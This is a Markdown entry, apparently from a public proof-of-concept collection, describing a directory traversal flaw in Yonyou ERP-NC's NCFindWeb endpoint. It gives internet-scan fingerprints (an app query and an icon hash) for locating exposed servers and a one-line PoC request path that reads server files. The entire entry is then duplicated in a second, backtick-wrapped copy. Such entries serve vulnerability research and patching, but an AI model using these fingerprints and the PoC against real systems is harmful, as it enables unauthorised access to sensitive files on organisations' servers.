Awesome-POC/OA产品漏洞/用友 ERP-NC NCFindWeb 目录遍历漏洞.md

# 用友 ERP-NC NCFindWeb 目录遍历漏洞

## 漏洞描述

用友 ERP-NC 存在目录遍历漏洞，攻击者可以通过目录遍历获取敏感文件信息。

## 漏洞影响

```
用友 ERP-NC
```

## 网络测绘

```
app="用友-UFIDA-NC"
# or
icon_hash="1085941792"
```

## 漏洞复现

poc

```plain
/NCFindWeb?service=IPreAlertConfigService&filename=
```

![](images/用友%20ERP-NC%20NCFindWeb%20目录遍历漏洞/image-20240704143115260.png)
update 2024-11-06 14:10:36 +08:00			`# 用友 ERP-NC NCFindWeb 目录遍历漏洞`

			`## 漏洞描述`

			`用友 ERP-NC 存在目录遍历漏洞，攻击者可以通过目录遍历获取敏感文件信息。`

			`## 漏洞影响`

			```
			`用友 ERP-NC`
			```

			`## 网络测绘`

			```
			`app="用友-UFIDA-NC"`
			`# or`
			`icon_hash="1085941792"`
			```

			`## 漏洞复现`

			`poc`

			```plain
			`/NCFindWeb?service=IPreAlertConfigService&filename=`
			```

			`![](images/用友%20ERP-NC%20NCFindWeb%20目录遍历漏洞/image-20240704143115260.png)`